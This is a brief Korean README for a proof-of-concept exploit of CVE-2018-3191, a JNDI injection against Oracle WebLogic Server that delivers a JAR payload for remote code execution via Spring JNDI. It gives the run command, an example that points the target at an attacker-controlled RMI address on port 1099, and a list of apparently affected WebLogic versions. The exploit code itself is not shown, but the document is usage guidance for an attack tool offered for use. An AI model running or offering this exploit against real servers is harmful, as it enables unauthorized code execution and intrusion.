
# CVE-2018-3191 개념 증명 익스플로잇 JNDI 주입을 통해 WebLogic Server를 대상으로 하는 CVE-2018-3191 개념 증명 익스플로잇입니다. Spring JNDI를 통해 원격 코드 실행을 트리거하는 JAR 페이로드를 전달합니다.
사용법:
java -jar weblogic-spring-jndi.jar <jndi_address>
예시:
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
참고:
12.2.1.3
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1